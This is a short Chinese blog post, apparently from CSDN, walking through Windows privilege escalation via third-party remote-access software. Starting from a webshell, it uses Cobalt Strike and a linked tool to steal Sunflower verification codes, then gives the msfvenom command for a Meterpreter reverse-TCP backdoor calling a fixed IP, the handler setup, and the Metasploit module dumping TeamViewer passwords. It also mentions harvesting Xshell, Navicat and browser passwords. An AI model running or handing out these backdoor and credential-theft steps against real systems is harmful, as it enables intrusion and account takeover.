Windows提权:第三方应用

本文讲述了利用向日葵和Teamviewer中的漏洞进行提权的过程,包括获取webshell权限,通过Beacon工具获取验证码,以及使用Metasploit框架创建后门。还提及了Xshell和Navicat等其他软件的密码抓取方法。
摘要由CSDN通过智能技术生成

目录

向日葵漏洞提权

Teamviewer提权


电脑(服务器)装的第三方应用越多,安全隐患越大

向日葵漏洞提权

已经拿到了webshell权限,这里的权限是普通用户的权限,查看服务进程

tasklist /svc

发现对方主机上存在向日葵的进程 

将其上线CS上,尝试通过CS抓取向日葵密码

上传工具到对方服务器

通过beacon执行工具

得到机器密文,这就是验证码,使用脚本解密

GitHub - wafinfo/Sunflower_get_Password: 一款针对向日葵的识别码和验证码提取工具

接下来可以使用向日葵远控软件直接连接靶机,向日葵的权限往往是高权限

Teamviewer提权

后门上线权限必须是管理员权限,低权限用户不能获取

上线MSF

msfvenom -p windows/meterpreter/reverse_tcp LHOST=47.94.130.42 LPORT=3333 -f exe -o msf.exe   #生成后门
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 0.0.0.0
set lport 3333
run

通过MSF模块获得passwd

run post/windows/gather/credentials/teamviewer_passwords

 密码一致,为uaq123

CS也有相关的插件可以利用

 还有比如:Xshell Navicat 浏览器的密码都可以通过CS进行抓取

  • 7
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值